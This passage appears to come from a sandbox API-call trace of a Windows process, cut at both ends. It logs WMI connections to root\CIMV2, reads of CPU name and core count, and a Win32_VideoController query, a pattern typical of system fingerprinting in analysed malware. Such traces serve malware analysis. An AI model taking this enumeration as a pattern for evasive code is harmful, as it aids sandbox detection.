puBuffLength=0x38f064*=0xf, pszText=0x0) returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f064*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f064*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f034 | out: puCount=0x38f034*=0x2) returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f030*=0x0, pszText=0x0 | out: puBuffLength=0x38f030*=0xf, pszText=0x0) returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f030*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f030*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0230.957] IWbemClassObject:Get (in: This=0x56375f8, wszName="Name", lFlags=0, pVal=0x38f030*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b14d0*=0, plFlavor=0x26b14d4*=0 | out: pVal=0x38f030*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x26b14d0*=8, plFlavor=0x26b14d4*=0) returned 0x0 [0230.957] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0230.957] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0230.958] IWbemClassObject:Get (in: This=0x56375f8, wszName="Name", lFlags=0, pVal=0x38f038*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b14d0*=8, plFlavor=0x26b14d4*=0 | out: pVal=0x38f038*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x26b14d0*=8, plFlavor=0x26b14d4*=0) returned 0x0 [0230.958] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0230.958] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0230.958] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f034 | out: puCount=0x38f034*=0x2) returned 0x0 [0230.958] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f030*=0x0, pszText=0x0 | out: puBuffLength=0x38f030*=0xf, pszText=0x0) returned 0x0 [0230.958] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f030*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f030*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0230.958] IWbemClassObject:Get (in: This=0x56375f8, wszName="NumberOfCores", lFlags=0, pVal=0x38f030*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b15dc*=0, plFlavor=0x26b15e0*=0 | out: pVal=0x38f030*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x26b15dc*=19, plFlavor=0x26b15e0*=0) returned 0x0 [0230.958] IWbemClassObject:Get (in: This=0x56375f8, wszName="NumberOfCores", lFlags=0, pVal=0x38f038*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b15dc*=19, plFlavor=0x26b15e0*=0 | out: pVal=0x38f038*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x26b15dc*=19, plFlavor=0x26b15e0*=0) returned 0x0 [0231.214] CoTaskMemAlloc (cb=0x4) returned 0x5642800 [0231.214] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642800, puReturned=0x26b0ca8 | out: apObjects=0x5642800*=0x0, puReturned=0x26b0ca8*=0x0) returned 0x1 [0231.314] CoTaskMemFree (pv=0x5642800) [0231.314] CoGetContextToken (in: pToken=0x38ef60 | out: pToken=0x38ef60) returned 0x0 [0231.314] IUnknown:Release (This=0x544f098) returned 0x1 [0231.314] IUnknown:Release (This=0x544f098) returned 0x0 [0231.316] CoGetContextToken (in: pToken=0x38ef60 | out: pToken=0x38ef60) returned 0x0 [0231.316] IUnknown:Release (This=0x544efd0) returned 0x1 [0231.316] IUnknown:Release (This=0x544efd0) returned 0x0 [0231.342] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f054 | out: ppv=0x38f054*=0x6d0cac) returned 0x0 [0231.342] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f04c | out: pAptType=0x38f04c*=1) returned 0x0 [0231.342] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f050 | out: ppvObject=0x38f050*=0x0) returned 0x80004002 [0231.342] IUnknown:Release (This=0x6d0cac) returned 0x1 [0231.343] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9c0 | out: ppv=0x38e9c0*=0x5642800) returned 0x0 [0231.343] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642800, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x0) returned 0x80004002 [0231.343] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642800, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ebe4 | out: ppvObject=0x38ebe4*=0x5644228) returned 0x0 [0231.343] WbemDefPath:IUnknown:Release (This=0x5642800) returned 0x0 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e804 | out: ppvObject=0x38e804*=0x5644228) returned 0x0 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7b8 | out: ppvObject=0x38e7b8*=0x0) returned 0x80004002 [0231.344] WbemDefPath:IUnknown:AddRef (This=0x5644228) returned 0x3 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e114 | out: ppvObject=0x38e114*=0x0) returned 0x80004002 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0c4 | out: ppvObject=0x38e0c4*=0x0) returned 0x80004002 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e0d0 | out: ppvObject=0x38e0d0*=0x5642780) returned 0x0 [0231.344] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642780, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e0d8 | out: pCid=0x38e0d8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.344] WbemDefPath:IUnknown:Release (This=0x5642780) returned 0x3 [0231.344] CoGetContextToken (in: pToken=0x38e130 | out: pToken=0x38e130) returned 0x0 [0231.344] CoGetContextToken (in: pToken=0x38e544 | out: pToken=0x38e544) returned 0x0 [0231.344] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5c4 | out: ppvObject=0x38e5c4*=0x0) returned 0x80004002 [0231.344] WbemDefPath:IUnknown:Release (This=0x5644228) returned 0x2 [0231.344] WbemDefPath:IUnknown:Release (This=0x5644228) returned 0x1 [0231.344] CoGetContextToken (in: pToken=0x38eed4 | out: pToken=0x38eed4) returned 0x0 [0231.344] CoGetContextToken (in: pToken=0x38ee34 | out: pToken=0x38ee34) returned 0x0 [0231.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644228, riid=0x38ef04*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef00 | out: ppvObject=0x38ef00*=0x5644228) returned 0x0 [0231.345] WbemDefPath:IUnknown:AddRef (This=0x5644228) returned 0x3 [0231.345] WbemDefPath:IUnknown:Release (This=0x5644228) returned 0x2 [0231.345] WbemDefPath:IWbemPath:SetText (This=0x5644228, uMode=0x4, pszPath="root\\CIMV2") returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38f07c | out: puCount=0x38f07c*=0x2) returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f078*=0x0, pszText=0x0 | out: puBuffLength=0x38f078*=0xf, pszText=0x0) returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f078*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f078*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38f068 | out: puCount=0x38f068*=0x2) returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f064*=0x0, pszText=0x0 | out: puBuffLength=0x38f064*=0xf, pszText=0x0) returned 0x0 [0231.345] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f064*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f064*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.345] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38eff8 | out: ppv=0x38eff8*=0x6d0cac) returned 0x0 [0231.345] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38eff0 | out: pAptType=0x38eff0*=1) returned 0x0 [0231.345] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38eff4 | out: ppvObject=0x38eff4*=0x0) returned 0x80004002 [0231.345] IUnknown:Release (This=0x6d0cac) returned 0x1 [0231.346] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec18 | out: ppv=0x38ec18*=0x563a5f0) returned 0x0 [0231.346] WbemLocator:IUnknown:QueryInterface (in: This=0x563a5f0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee30 | out: ppvObject=0x38ee30*=0x0) returned 0x80004002 [0231.346] WbemLocator:IClassFactory:CreateInstance (in: This=0x563a5f0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee3c | out: ppvObject=0x38ee3c*=0x56427b0) returned 0x0 [0231.346] WbemLocator:IUnknown:Release (This=0x563a5f0) returned 0x0 [0231.346] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea5c | out: ppvObject=0x38ea5c*=0x56427b0) returned 0x0 [0231.346] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea10 | out: ppvObject=0x38ea10*=0x0) returned 0x80004002 [0231.346] WbemLocator:IUnknown:AddRef (This=0x56427b0) returned 0x3 [0231.346] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e36c | out: ppvObject=0x38e36c*=0x0) returned 0x80004002 [0231.346] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e31c | out: ppvObject=0x38e31c*=0x0) returned 0x80004002 [0231.347] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e328 | out: ppvObject=0x38e328*=0x0) returned 0x80004002 [0231.347] CoGetContextToken (in: pToken=0x38e388 | out: pToken=0x38e388) returned 0x0 [0231.347] CoGetContextToken (in: pToken=0x38e79c | out: pToken=0x38e79c) returned 0x0 [0231.347] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e81c | out: ppvObject=0x38e81c*=0x0) returned 0x80004002 [0231.347] WbemLocator:IUnknown:Release (This=0x56427b0) returned 0x2 [0231.347] WbemLocator:IUnknown:Release (This=0x56427b0) returned 0x1 [0231.347] CoGetContextToken (in: pToken=0x38ee14 | out: pToken=0x38ee14) returned 0x0 [0231.347] CoGetContextToken (in: pToken=0x38ed74 | out: pToken=0x38ed74) returned 0x0 [0231.347] WbemLocator:IUnknown:QueryInterface (in: This=0x56427b0, riid=0x38ee44*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee40 | out: ppvObject=0x38ee40*=0x56427b0) returned 0x0 [0231.347] WbemLocator:IUnknown:AddRef (This=0x56427b0) returned 0x3 [0231.347] WbemLocator:IUnknown:Release (This=0x56427b0) returned 0x2 [0231.347] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38efd4 | out: puCount=0x38efd4*=0x2) returned 0x0 [0231.347] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=8, puBuffLength=0x38efd0*=0x0, pszText=0x0 | out: puBuffLength=0x38efd0*=0xf, pszText=0x0) returned 0x0 [0231.347] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=8, puBuffLength=0x38efd0*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efd0*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.347] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38ee80 | out: ppv=0x38ee80*=0x5642790) returned 0x0 [0231.347] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642790, strNetworkResource="\\\\.\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef20 | out: ppNamespace=0x38ef20*=0x563f548) returned 0x0 [0231.586] WbemLocator:IUnknown:QueryInterface (in: This=0x563f548, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c507c) returned 0x0 [0231.586] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c507c, pProxy=0x563f548, pAuthnSvc=0x38edf4, pAuthzSvc=0x38edf0, pServerPrincName=0x38ede8, pAuthnLevel=0x38edec, pImpLevel=0x38eddc, pAuthInfo=0x38ede0, pCapabilites=0x38ede4 | out: pAuthnSvc=0x38edf4*=0xa, pAuthzSvc=0x38edf0*=0x0, pServerPrincName=0x38ede8, pAuthnLevel=0x38edec*=0x6, pImpLevel=0x38eddc*=0x2, pAuthInfo=0x38ede0, pCapabilites=0x38ede4*=0x1) returned 0x0 [0231.586] WbemLocator:IUnknown:Release (This=0x55c507c) returned 0x1 [0231.586] WbemLocator:IUnknown:QueryInterface (in: This=0x563f548, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed98 | out: ppvObject=0x38ed98*=0x55c509c) returned 0x0 [0231.586] WbemLocator:IUnknown:QueryInterface (in: This=0x563f548, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed84 | out: ppvObject=0x38ed84*=0x55c507c) returned 0x0 [0231.586] WbemLocator:IClientSecurity:SetBlanket (This=0x55c507c, pProxy=0x563f548, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.586] WbemLocator:IUnknown:Release (This=0x55c507c) returned 0x2 [0231.586] WbemLocator:IUnknown:Release (This=0x55c509c) returned 0x1 [0231.586] CoTaskMemFree (pv=0x55feb88) [0231.587] WbemLocator:IUnknown:AddRef (This=0x563f548) returned 0x2 [0231.587] WbemLocator:IUnknown:Release (This=0x5642790) returned 0x0 [0231.587] CoGetContextToken (in: pToken=0x38e2d8 | out: pToken=0x38e2d8) returned 0x0 [0231.587] CoGetContextToken (in: pToken=0x38e6ec | out: pToken=0x38e6ec) returned 0x0 [0231.587] WbemLocator:IUnknown:QueryInterface (in: This=0x563f548, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e684 | out: ppvObject=0x38e684*=0x55c5084) returned 0x0 [0231.587] WbemLocator:IRpcOptions:Query (in: This=0x55c5084, pPrx=0x563a650, dwProperty=2, pdwValue=0x38e778 | out: pdwValue=0x38e778) returned 0x80004002 [0231.587] WbemLocator:IUnknown:Release (This=0x55c5084) returned 0x2 [0231.587] CoGetContextToken (in: pToken=0x38ecbc | out: pToken=0x38ecbc) returned 0x0 [0231.588] CoGetContextToken (in: pToken=0x38ec1c | out: pToken=0x38ec1c) returned 0x0 [0231.588] WbemLocator:IUnknown:QueryInterface (in: This=0x563f548, riid=0x38ecec*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebb8 | out: ppvObject=0x38ebb8*=0x563f548) returned 0x0 [0231.588] WbemLocator:IUnknown:Release (This=0x563f548) returned 0x2 [0231.588] SysStringLen (param_1=0x0) returned 0x0 [0231.588] CoGetContextToken (in: pToken=0x38edcc | out: pToken=0x38edcc) returned 0x0 [0231.588] IWbemServices:ExecQuery (in: This=0x563f548, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x38efe0 | out: ppEnum=0x38efe0*=0x544efd0) returned 0x0 [0231.596] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee30 | out: ppvObject=0x38ee30*=0x544efd4) returned 0x0 [0231.596] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38ee80, pAuthzSvc=0x38ee7c, pServerPrincName=0x38ee74, pAuthnLevel=0x38ee78, pImpLevel=0x38ee68, pAuthInfo=0x38ee6c, pCapabilites=0x38ee70 | out: pAuthnSvc=0x38ee80*=0xa, pAuthzSvc=0x38ee7c*=0x0, pServerPrincName=0x38ee74, pAuthnLevel=0x38ee78*=0x6, pImpLevel=0x38ee68*=0x2, pAuthInfo=0x38ee6c, pCapabilites=0x38ee70*=0x1) returned 0x0 [0231.596] IUnknown:Release (This=0x544efd4) returned 0x1 [0231.596] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee24 | out: ppvObject=0x38ee24*=0x55c4bec) returned 0x0 [0231.596] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee10 | out: ppvObject=0x38ee10*=0x544efd4) returned 0x0 [0231.596] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.597] IUnknown:Release (This=0x544efd4) returned 0x2 [0231.597] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0231.598] CoTaskMemFree (pv=0x55feaf8) [0231.598] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0231.598] CoGetContextToken (in: pToken=0x38e350 | out: pToken=0x38e350) returned 0x0 [0231.598] CoGetContextToken (in: pToken=0x38e764 | out: pToken=0x38e764) returned 0x0 [0231.598] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6fc | out: ppvObject=0x38e6fc*=0x55c4bd4) returned 0x0 [0231.598] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563a638, dwProperty=2, pdwValue=0x38e7f0 | out: pdwValue=0x38e7f0) returned 0x80004002 [0231.599] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0231.599] CoGetContextToken (in: pToken=0x38ed34 | out: pToken=0x38ed34) returned 0x0 [0231.599] CoGetContextToken (in: pToken=0x38ec94 | out: pToken=0x38ec94) returned 0x0 [0231.599] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ed64*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec30 | out: ppvObject=0x38ec30*=0x544efd0) returned 0x0 [0231.599] IUnknown:Release (This=0x544efd0) returned 0x2 [0231.599] SysStringLen (param_1=0x0) returned 0x0 [0231.599] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38f02c | out: puCount=0x38f02c*=0x2) returned 0x0 [0231.599] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f028*=0x0, pszText=0x0 | out: puBuffLength=0x38f028*=0xf, pszText=0x0) returned 0x0 [0231.599] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f028*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f028*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.599] CoGetContextToken (in: pToken=0x38ee84 | out: pToken=0x38ee84) returned 0x0 [0231.600] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f038 | out: ppEnum=0x38f038*=0x544f098) returned 0x0 [0231.600] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eef4 | out: ppvObject=0x38eef4*=0x544f09c) returned 0x0 [0231.601] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef44, pAuthzSvc=0x38ef40, pServerPrincName=0x38ef38, pAuthnLevel=0x38ef3c, pImpLevel=0x38ef2c, pAuthInfo=0x38ef30, pCapabilites=0x38ef34 | out: pAuthnSvc=0x38ef44*=0xa, pAuthzSvc=0x38ef40*=0x0, pServerPrincName=0x38ef38, 